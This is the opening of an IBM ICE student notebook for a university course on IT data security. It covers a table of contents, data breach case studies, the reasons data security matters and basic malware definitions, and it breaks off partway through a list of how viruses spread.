It Security

V10.
1
Student Notebook
TOC Contents
Trademarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ix
Course description . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xi
Agenda . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xiii
Unit . Data Security Threats. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -1

IT Data Security – Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -2
Unit objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -3
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -4
Case Study 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -5
Case Study 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -6
Case Study 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -8
Need of Data Security (1 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -9
Need of Data Security (2 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -10
Importance of Data Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -11
Critical Data for Organizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -12
Elements to consider for a better security mechanism . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -13
Process 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -14
Process 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -15
Process 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -16
Types of Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -17
Malware Threat (1 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -18
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -25
Network Based Threats (1 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -26
Network Based Threats (10 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -36
Network Based Threats (11 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -37
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -38
Cryptographic Threats (1 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -39
© Copyright IBM Corp. 2015 Contents iii

Course materials may not be reproduced in whole or in part
without the prior written permission of IBM.
Student Notebook
Cryptographic Threats (7 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-45

Types of Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-46
Database Security Threats (1 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-47
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-53
Banking Fraud Threats (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-54
Web-application Threats (1 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-59
Physical Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-65
Types of Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-67
Wireless Network Security Threat (1 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-68
Wireless Network Security Threats (2 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-69
Bluetooth Devices Threats (1 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-74
Data Threats in Modern Era (1 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-79
Benefits of Data Security (1 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-85
Benefits of Data Security (2 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-86
Checkpoint (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-87
Checkpoint (2 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-88
Checkpoint (3 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-89
Checkpoint (4 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-90
Unit summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-91
Unit 2. Data Security Threat Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-1

IT Data Security – Data Security Threat Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2
Unit objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-3
iv IT Data Security © Copyright IBM Corp. 2015

V10.1
Student Notebook
TOC Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4

Threat Techniques (1 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-5
Threat Techniques (6 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11
Threat Techniques (10 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-15
Threat Technique (16 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-22
Network Based Threat Techniques (22 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-29
Network Based Threat Techniques (25 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-32
Cryptographic Threat Techniques (31 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-38
Banking Fraud Techniques (43 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-52
© Copyright IBM Corp. 2015 Contents v

Student Notebook
Web-application Threat Techniques (51 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-63

Threat Techniques (52 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-64
Wireless Network Threat Techniques (59 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-71
Threat Technique (60 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-72
Wireless Network Threat Techniques (62 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-74
Checkpoint (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-79
Checkpoint (2 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-80
Checkpoint (3 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-81
Checkpoint (4 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-82
Unit summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-83
Unit 3. Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-1

IT Data Security – Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2
Unit objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-3
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-4
The Importance of Data Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-5
Evolution of Mitigation Technique (1 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-7
Evolution of Mitigation Technique (4 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-10
Countermeasures (1 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-14
Countermeasures (10 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-27
vi IT Data Security © Copyright IBM Corp. 2015

V10.1
Student Notebook
TOC Countermeasures (19 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-40

Countermeasures (20 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-41
Checkpoint (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-79
Checkpoint (2 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-80
Checkpoint (3 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-81
Checkpoint (4 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-82
Unit summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-83
Appendix A. Checkpoint solutions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A-1
Appendix B. Title . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B-1
© Copyright IBM Corp. 2015 Contents vii

Student Notebook
viii IT Data Security © Copyright IBM Corp. 2015

V10.1
Student Notebook
TMK
Trademarks
The reader should recognize that the following terms, which appear in the content of this training
document, are official trademarks of IBM or other companies:
IBM, the IBM logo, and ibm.com are trademarks or registered trademarks of International Business
Machines Corp., registered in many jurisdictions worldwide.
The following are trademarks of International Business Machines Corporation, registered in many
jurisdictions worldwide:
HACMP™ Power®
Linux is a registered trademark of Linus Torvalds in the United States, other countries, or both.
Microsoft and Windows are trademarks of Microsoft Corporation in the United States, other
countries, or both.
Java™ and all Java-based trademarks and logos are trademarks or registered trademarks of
Oracle and/or its affiliates.
UNIX is a registered trademark of The Open Group in the United States and other countries.
Skimmer® is a trademark or registered trademark of IBM International Group B.V., an IBM
Company.
Evolution® is a trademark or registered trademark of Kenexa, an IBM Company.
Other product and service names might be trademarks of IBM or other companies.
© Copyright IBM Corp. 2015 Trademarks ix

Student Notebook
x IT Data Security © Copyright IBM Corp. 2015

V10.1
Student Notebook
pref
Course description
IT Data Security
Duration: 4 days
Purpose
This course is designed to endow students with the knowledge about threats, threat
techniques and associated countermeasures related to IT Data Security. This course
will also help the students in understanding the working of an activity monitoring tool.
Audience
Bachelor of Technology (B.Tech) Students.
Prerequisites
Basic Internet knowledge
Objectives
After completing this course, you should be able to:
• To understand the background of Data Security
• To recognize and classify different threats and the associated threat techniques
related to Data Security
• To identify and understand the steps involved in various attacks
• To understand the trends of emerging threats
• To recognize the importance of information protection
• To enumerate the countermeasures associated to the different fields of Data
Security
• To use the InDefend (Activity Monitoring) Tool
Contents
Course content here
Unit 1 - Data Security Threats
Unit 2 - Data Security Threat Techniques
Unit 3 - Countermeasures
© Copyright IBM Corp. 2015 Course description xi

Student Notebook
xiv IT Data Security © Copyright IBM Corp. 2015

V10.1
Student Notebook
Uempty
Unit 1. Data Security Threats
What this unit is about

This unit is about
• Background of Data Security
• Data Security need and associated threats
• Classification of Data Security Threats
What you should be able to do

After completing this unit, you should be able to:
• Understand the background of Data Security
• Recognize various associated threats
• Classify different threats associated with Data Security
How you will check your progress

• Checkpoint
References
Norman, "Assessing Vulnerability", Risk Analysis and Security Countermeasure Selection,
2009
http://www.microsoft.com/technet/security/bestprac/bpent/sec1/secthret.mspx
http://www.giac.org/paper/gsec/4152/identity-theft-attacks-countermeasures/106663
http://www.nsf.gov/oig/identitytheft.pdf
http://www.ils.unc.edu/~wenyang/inls258/wenyang.htm
© Copyright IBM Corp. 2015 Unit 1. Data Security Threats 1-1

Student Notebook
IBM ICE (Innovation Centre for Education)
Welcome to:
IT Data Security – Data Security Threats
© Copyright IBM Corporation 2015 9.1
Figure 1-1. IT Data Security – Data Security Threats DS011.0
Notes:
1-2 IT Data Security © Copyright IBM Corp. 2015

V10.1
Student Notebook
Uempty
Unit objectives IBM ICE (Innovation Centre for Education)

IBM Power Systems

© Copyright IBM Corporation 2015
Figure 1-2. Unit objectives DS011.0
Notes:

Student Notebook
Background IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Data protection is needed not only to protect the data on a system from harmful cyber-
attacks or viruses, but also to ensure that if it does find its way into the wrong hands, it
remains secure and unable to be viewed
• Data protection is comprised of many elements, including where the data resides, how it is
used and who has access to it
• For any organization, data security is a vital issue. They can suffer serious issues if an user
who is not authorized to gain access to their data enters their systems
Figure 1-3. Background DS011.0
Notes:
Background
In this digital and inter-connected era, organizations hold and exchange vast amounts of data relating to
employees and consumers. Whether a company obtains that data from other companies in its role as a
service provider, or whether it is the owner of the data, it is now well understood that companies that collect,
maintain or use personal information have a serious responsibility to protect the security and integrity of that
information. Data protection is needed not only to protect the data on a system from harmful cyber-attacks or
viruses, but also to ensure that if it does find its way into the wrong hands, it remains secure and unable to be
viewed. Data protection is comprised of many elements, including where the data resides, how it is used and
who has access to it. Risk comes from both inside and outside the organization from employees to third-party
vendors and cyber criminals looking for financial gain or to intentionally or unintentionally inflict damage to an
organization’s reputation. For any organization, data security is a vital issue. They can suffer serious issues if
an user who is not authorized to gain access to their data enters their systems. By examining the critical data
which is held by both individual and business, the value of data can be understood. Most of the critical data
like salary information, business plan, financial results and employee records are held by organizations. They
also have the data for research, trade secrets and other valuable information which can provide them an edge
over their competitors. When it comes to individuals, they hold personal data on their personal computers and
also perform functions Online such as shopping, social networking and many more. They also share their
sensitive data with others. All of this data is stored on the Internet as they share and process it. This
increases the risk of data being leaked.

V10.1
Student Notebook
Uempty
Case Study 1 IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Overview
– The contingency plan of an organization has managing and protecting data as one of its necessary
part.
– Data breach can cause very large financial penalties, reputation loss and expensive law suits for any
organization
– It can also have a serious impact on individuals, as their identity can be stolen and a large damage
can be made when it comes to their credit rating or financial history
Figure 1-4. Case Study 1 DS011.0
Notes:
Case Study
Overview
The contingency plan of an organization has managing and protecting data as one of its necessary part. If the
data they hold is compromised due to lack of adequate protection then the data can be compromised which is
also known as Data Breach. There can be severe consequences of a data breach. Data breach can cause
very large financial penalties, reputation loss and expensive law suits for any organization. It can also have a
serious impact on individuals, as their identity can be stolen and a large damage can be made when it comes
to their credit rating or financial history. It can take many years in recovering from a data breach and also a
huge cost is involved. The section below gives some examples of data breaches:

Student Notebook

IBM Power Systems
• eBay
• Sony
• Gaana.com
• BlueCross BlueShield
• Methodist Hospital
Notes:
Case Studies
eBay: One of the biggest data breaches was reported for eBay. The login credentials of a small number of
employees was compromised by the attackers which allowed them to gain access to the network of the
organization. This was carried out between late Feburary and early March. A database which contains all the
names of the customer, their email addresses, physical addresses, encrypted passwords etc. were
compromised. The organization has a staggering number of members and the information associated with all
of them were affected due to this breach. As a countermeasure, the organization asked all its users to change
their passwords.
Sony: Sony Pvt. Ltd. was hacked as well in the recent times and all their confidential data was leaked. There
were numerous other cases where an organization was destroyed by hacking or breaching their confidential
data. Clearly, cyber security is still a significant issue that needs to be addressed.
Gaana.com: Gaana.com, one of India's most popular music streaming service with more than 10 million
registered users and 7.5 million monthly visitors was reportedly hacked, exposing the site’s user information
database. A Pakistani hacker, who claimed responsibility for the hack, claimed that details of over 10 Million
users of Gaana service including their username, email addresses, MD5-encrypted password, date of births,
and other personal information has been stolen and made available in a searchable database.

V10.1
Student Notebook
Uempty BlueCross BlueShield: BlueCross BlueShield of Tennessee reported the theft of 57 computer hard drives
from a training facility. BCBS initially reported that the drives did not contain personal information and that
they were encrypted, but they later rescinded both statements. To date, they have spent more than $7 million
recovering from the breach, including credit monitoring services for the 220,000 people affected and 700
employees working to identify the details of the breach.
Methodist Hospital: The Methodist Hospital in Houston, Texas reported the theft of a laptop from a medical
office in the Texas Medical Center. The laptop was attached to a medical device that test pulmonary function,
and contained private health information and Social Security Numbers of 689 people. The hospital has
offered one year free subscription for credit monitoring and identity theft protection to those affected.

Student Notebook

IBM Power Systems
• Health Net
• Michaels Stores
• Variable Annuity Life Insurance Co.
Notes:
Case Study
Health Net: The Connecticut Attorney General has sued Health Net, claiming the insurance company failed
to adequately protect the medical records of 446,000 patients whose private data was stored on a missing
disk drive, and waited six months to notify customers of the breach. The missing disk contained health
information, Social Security Numbers, and bank account numbers.
Michaels Stores: Between May 2013 and January 2014, the point of sale systems at the Michael stores
were attacked by criminals. They used highly robust malware to attack the systems of the store. About 2.6
million payment card numbers were leaked during this attack.
Variable Annuity Life Insurance Co.: The data of variable annuity life insurance Company was leaked by a
former financial advisor. The advisor had a thumb drive which had information on 774723 customers of this
organization. It also included social security numbers with it. The thumb drive was given back to the
organization when it issued a search warrant on the advisor. Though the company believed that the data
which was present on the thumb drive was not used but still it was a huge issue. Threats to sensitive data
have reached a critical point, with the sophistication and frequency of attacks escalating over the last several
years. It is imperative that organizations implement security solutions that will not only protect important data
assets but also satisfy the compliance mandates to which they are held accountable. Reaching the
appropriate balance between ease of communication and strong protection of sensitive information is one of
the most significant challenges faced by today’s business network and security teams.

V10.1
Student Notebook
Uempty
Need of Data Security (1 of 2) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• An organization cannot run without a proper data security mechanism in place
• Every organization today has all their data present in digital form, which if not protected can
have catastrophic effect on the business continuity of the organization
• Data security is extremely important for all companies, large and small. On an average daily
basis, data theft occurs from a multitude of companies, either by accident or on purpose
Figure 1-7. Need of Data Security (1 of 2) DS011.0
Notes:
Need of Data Security

With the increasing cases of data breaches in all the sections of the society, the need to secure data has
maximized. An organization cannot run without a proper data security mechanism in place. Every
organization today has all their data present in digital form, which if not protected can have catastrophic effect
on the business continuity of the organization. Thus data security is not good to have but it is a must to have.
Following sections list different factors which have increased the need of data security in corporate and in
health institutions. Data security is extremely important for all companies, large and small. On an almost daily
basis, data theft occurs from a multitude of companies, either by accident or on purpose. Such breaches can
put the information of thousands of consumers at risk, or enable competitors to access confidential
information.

Student Notebook
Need of Data Security (2 of 2) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• The process of protecting massive amounts of data or information which an organization may
want to keep confidential and protected from others is known as Business Data Protection
• Often, organizations struggle to create real-time security policies as the data keeps growing
• While data breaches affect businesses of all sizes, many small business owners aren’t taking
the necessary steps to create ongoing data security policies and practices, including training
their employees
Figure 1-8. Need of Data Security (2 of 2) DS011.0
Notes:
Need of Data Security

Most businesses have massive amounts of data or information which they may want to keep confidential and
protected from others. The process of protecting this kind of data is known as Business Data Protection.
Often, organizations struggle to create real-time security policies as the data keeps growing. It also finds it
tough to monitor all data from one central location in big data platforms. Information like client details, bank
details, account details, personal files, etc. must be well protected for everyone on the planet because if it
gets into wrong hands, it can be misused easily. Such information can be hard to replace and potentially
dangerous. By securing such data or information, one can protect the files and avoid facing any difficulties.
While data breaches affect businesses of all sizes, many small business owners aren’t taking the necessary
steps to create ongoing data security policies and practices, including training their employees. Many small
business owners recognize the importance of data security but don’t understand how vulnerable they really
are, may feel intimidated by the issue or think that they lack the resources to implement a sound strategy. As
a result, data thieves often target small business owners, stealing both the sensitive financial information of
the business and its customers.

V10.1
Student Notebook
Uempty
Importance of Data Security IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Reputational Advantage
• Dynamic Threats Paradigm
• Ongoing productivity
Figure 1-9. Importance of Data Security DS011.0
Notes:
Introduction
Reputational Advantage: All the reputation that an organization that they make over the years can be
shattered in a single stroke if a data breach takes place. The data that an organization possesses has
confidential information of customers or clients and once data is lost they might fall short of all explanations.
Dynamic threats paradigm: Another reason why data security is important is because the threats are on an
increase these days and without securing data, one cannot expect to run a business or even go on as a home
PC user. This is because of the emergence of mobile devices, internet and cloud computing, etc.
.
Ongoing productivity: Having a companywide understanding of the importance of data protection means
that an organization’s workforce will be more aware of the risks of data loss. Without the regular backup of
company data it won’t be long until a key set of files is lost, productivity has to stop and an embarrassed
phone call to customers follows. A data protection policy is as much about being able to recover important
customer related data as it is about stopping data from being exposed.

Student Notebook
Critical Data for Organizations IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Customer Information
– The data associated to its customer should be of top most priority
• Product Information
– Protecting information about the existing products and the products to be launched can be a high
priority thing for many organizations
• Employee Information
– All the detailed personal information of the employees are in the possession of most of the
organizations
• Company Information
– An organization has various critical data which it needs to protect
Figure 1-10. Critical Data for Organizations DS011.0
Notes:
Critical data for organizations: In order to secure data, the organization must first understand which piece
of information needs to be protected. After selecting the information of critical value proper safeguards and
procedures must be enacted to keep the information safe. Below are some examples of the critical
information that a company possess which must be protected:
• Customer Information: For any organization, the data associated to its customer should be of top most priority. The
business of the organization won’t flourish if the customers loose trust on them. If critical data which belonged to the
customer is lost, then the business will go to a competing organization. Thus data security is very important to keep
the customer information secured.
• Product Information: Protecting information about the existing products and the products to be launched can be a
high priority thing for many organizations. If the competing companies come to know about the product which the
other organization is about to launch then this could be a big loss. Thus companies need to implement data security
to save their information associated to the products.
• Employee Information: All the detailed personal information of the employees are in the possession of most of the
organizations. Data like address, employment records, social security numbers and telephone numbers of the
employees are stored by them. Thus data security is very important in order to protect information of the employees.
• Company Information: An organization has various critical data which it needs to protect. The data may include
financial information, R&D papers and other valuable data that concerns the business. The reputations of the
organization may be hampered if this critical data is accessible to a user who is not authorized. Thus protecting the
information associated to an organization is very important.

V10.1
Student Notebook
Uempty
Elements to consider for a better
security mechanism IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Cost
– The cost plays an important role
• The Price of Disruption

– An organization must always go with the option which causes the least amount of disruption while
implementing data security mechanism
• What is to lose
– Security needs of an organization must be of utmost priority if the business of this organization realize
on the trust of the customer
• Where Potential Threat are

– An organization should always consider the biggest threat that their sensitive data faces
Figure 1-11. Elements to consider for a better security mechanism DS011.0
Notes:
Elements to consider for a better data security mechanism
Below are the elements which needs to be considered in order to set-up a better mechanism to secure data:
• Cost: The cost plays an important role in the data protection of an organization. They have to be specific
that the amount of money invested in the protection of data is not more than what they are protecting.
• The Price of Disruption: An organization must always go with the option which causes the least amount
of disruption while implementing data security mechanism. Elements like their usual workflow, the way
their employees work etc. must be considered while employing security measures.
• What is to lose: Security needs of an organization must be of utmost priority if the business of this
organization realize on the trust of the customer. It should always be noted that organizations have more
than money to loose when it comes to security breaches.
• Where Potential Threat are: An organization should always consider the biggest threat that their
sensitive data faces. This consideration should be made before they invest in security measures. If the
weakest points are considered by an organization they would know exactly that what type of security
measures they should implement and where to implement them.
It doesn’t matter that whether an organization is small or large, they cannot ignore security. It only takes one
betrayed customer to destroy the reputation of an organization. If an organization thinks that they won’t fall
tray to a cyber-attack, then they are gambling with their entire business. They can be rest assured about the
critical data that they possess if they put a few basic security measures in place.

Student Notebook
Process 1 IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Overview
– The data possessed by an organization is the most critical thing they need to protect
– There can be many reasons for the data getting lost like it can be deleted intentionally or un-
intentionally
• Definition
– Data security refers to protective digital privacy measures that are applied to prevent unauthorized
access to computers, databases and websites. Data security also protects data from corruption. Data
security is the main priority for organizations of every size and genre
Figure 1-12. Process 1 DS011.0
Notes:
Process: The data possessed by an organization is the most critical thing they need to protect. It is more
valuable than the computer software and hardware that an organization has. If there is a problem with the
software or the hardware, it can be mandated or replaced. But if critical data is lost, it will take time, money
and effort to recover it. Securing the possessed data must be the top priority of an organization.
There can be many reasons for the data getting lost like it can be deleted intentionally or un-intentionally.
Data lost due to disasters such as a flood or fire is crushing, but losing it to hackers or a malware infection can
have much greater consequences. Data is one of the most important assets of any organization and people
are usually considered to be the weakest link in the security chain. It is of the utmost importance that internal
staffs are fully aware of their collective responsibility through education and regular reminders, so that the
importance of data security is not forgotten or overlooked. Each employee must be fully aware of his or her
own responsibilities, their restrictions on data access, and disciplinary action that would be taken for any
breach of security. These can all serve as the driving force for self-improvement in terms of data security. For
any organization data is very important. It can be customer, corporate or employee, data should be protected
at all costs. The data of an organization faces many internal and external threats. The users allowed to make
huge losses to the organization if confidential data is not secured properly. Data security refers to protective
digital privacy measures that are applied to prevent unauthorized access to computers, databases and
websites. Data security also protects data from corruption. Data security is the main priority for organizations
of every size and genre.

V10.1
Student Notebook
Uempty

IBM Power Systems
Notes:
This slide shows the lifecycle of data security. Explanation of the data security lifecycle has been provided in
the next slide.

Student Notebook

IBM Power Systems
• Explanation
– Data security is a critical consideration for any organization
– Data security is especially important for state agencies, where the public's trust is essential for the
efficient delivery of services
– Security can be a significant investment, which adds to an already long list of administrative duties
– The focus behind data security is to ensure privacy while protecting personal or corporate data
– Data security deals with the protection of a database from any kind of actions or forces that can be
dangerous for the database
Notes:
Process: Data security is a critical consideration for any organization that depends on information systems
and networks to meet its mission or business objectives. Data security is especially important for state
agencies, where the public's trust is essential for the efficient delivery of services. Security can be a
significant investment, which adds to an already long list of administrative duties. Managing secure networks,
developing and implementing new system functionality, maintaining thousands of system users, and other
day-to-day security tasks can strain limited administrative resources. However, agency management must
understand that proper protection of citizens' information is a requirement and not a luxury in the current
interconnected cyber environment. Data security is the practice of keeping data protected from corruption and
unauthorized access. The focus behind data security is to ensure privacy while protecting personal or
corporate data. Data security deals with the protection of a database from any kind of actions or forces that
can be dangerous for the database. It is basically securing the data from accessibility of unauthorized users.
Data protection can be used in two contexts. Firstly, it may be used as the same as data security. Secondly, it
may be used for ensuring the availability of data for access. Data security is commonly referred to as the
confidentiality, availability, and integrity of data. In other words, it is all of the practices and processes that are
in place to ensure data isn't being used or accessed by unauthorized individuals or parties. Data security
ensures that the data is accurate and reliable and is available when those with authorized access need it. A
data security plan includes facets such as collecting only the required information, keeping it safe, and
destroying any information that is no longer needed. These steps will help any business meet the legal
obligations of possessing sensitive data.

V10.1
Student Notebook
Uempty
Types of Data Security Threats IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Malware Threats
– Malicious software or malwares refer to a broad category of software threats to any network and
systems, including viruses, Trojan horses, logic bombs and worms
– The users in an organization needs help from them to decline these attacks and keep the systems in
their organization safe from any damage
– Attacks like these can spread through the entire network and can be devastating to the systems
which are in the network
– This is considered the largest worm infestation to date, and variants of it are still on the internet and
propagating
Figure 1-15. Types of Data Security Threats DS011.0
Notes:
Types of Data Security Threats
With the ever-increasing use of Computer technology, threats to the data stored in the computer has also
increased. There has been a substantial computer usages growth in society but they also need to be
equipped in a better manner to fight the challenges which are associated with this new era. New data security
threats have evolved which has made data more vulnerable to attacks. The section below discusses these
threats to data security in more detail.
Malware threats
Malicious software or malwares refer to a broad category of software threats to any network and systems,
including viruses, Trojan horses, logic bombs and worms. The users in an organization needs help from them
to decline these attacks and keep the systems in their organization safe from any damage. Attacks like these
can spread through the entire network and can be devastating to the systems which are in the network.
Conficker worm was one such virus that spread rapidly through PCs running Microsoft operating systems in
late 2008. This is considered the largest worm infestation to date, and variants of it are still on the internet and
propagating. Below are the detailed information about these malwares and the threat they possess

Student Notebook
Malware Threat (1 of 7) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Virus
– A program written to change the operations of a computer, without the knowledge or the permission of
the user is a Virus
– A computer system can be infected by a virus. It can be residing on a computer, but it may also be
damaging the data on the computer system’s hard-drive
– The virus may also destroy the operating system of the computer and can spread to the other system
which are connected to that device
Figure 1-16. Malware Threat (1 of 7) DS011.0
Notes:
Virus: A program written to change the operations of a computer, without the knowledge or the permission of
the user is a Virus. It replicates itself and does a damage to the systems which are associated in the process.
A computer system can be infected by a virus. It can be residing on a computer, but it may also be damaging
the data on the computer system’s hard-drive. The virus may also destroy the operating system of the
computer and can spread to the other system which are connected to that device. There are three ways in
which a virus can get into a computing system:
- Through social networking sites and email
